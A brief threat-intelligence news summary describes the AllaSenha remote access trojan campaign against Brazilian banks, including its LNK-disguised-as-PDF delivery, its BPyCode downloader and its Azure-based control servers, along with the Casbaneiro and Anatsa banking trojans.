May 29, 2024 at 11:09AM
A new campaign targets Brazilian banks with a Windows-based AllaSenha RAT, using Azure cloud as C2 infrastructure. The attack begins with a malicious LNK file disguised as a PDF, hosted since March 2024. The BPyCode launcher fetches and executes malicious files to steal banking credentials. Additionally, Anatsa Android Banking Trojan infiltrates the Google Play Store.
Key takeaways from the meeting notes:
1. Brazilian banking institutions are being targeted by a new campaign distributing the AllaSenha remote access trojan, specifically designed to steal access credentials for Brazilian bank accounts.
2. The attack vector involves the use of malicious links in phishing messages, and the initial access point is a malicious Windows shortcut (LNK) file masquerading as a PDF document, hosted on a WebDAV server.
3. The BPyCode launcher is utilized to execute a Base64-encoded PowerShell command, which then downloads and executes the BPyCode Python script, functioning as a downloader for a dynamic-link library and running it in memory.
4. AllaSenha not only steals online banking account credentials but also has the capability to capture two-factor authentication codes and deceive victims into approving fraudulent transactions.
5. Further analysis points to a Portuguese-speaking user named bert1m as the likely developer of the malware.
6. In addition to the AllaSenha campaign, there are also details of a separate malspam campaign distributing the Casbaneiro banking trojan and an Android banking trojan called Anatsa sneaking into the Google Play Store.
7. The Android banking trojan, Anatsa, discreetly exfiltrates sensitive banking credentials and financial information by using overlay and accessibility techniques.
8. Zscaler has identified over 90 malicious apps on the Play Store in the past few months, collectively amassing more than 5.5 million installations and propagating various malware families.
Overall, this information highlights ongoing and evolving cyber threats to banking institutions, as well as the potential impact on global financial applications and users, necessitating heightened vigilance and security measures.